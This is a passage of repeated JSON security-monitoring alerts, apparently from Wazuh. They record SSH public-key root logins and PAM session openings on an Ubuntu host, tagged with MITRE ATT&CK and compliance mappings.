Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 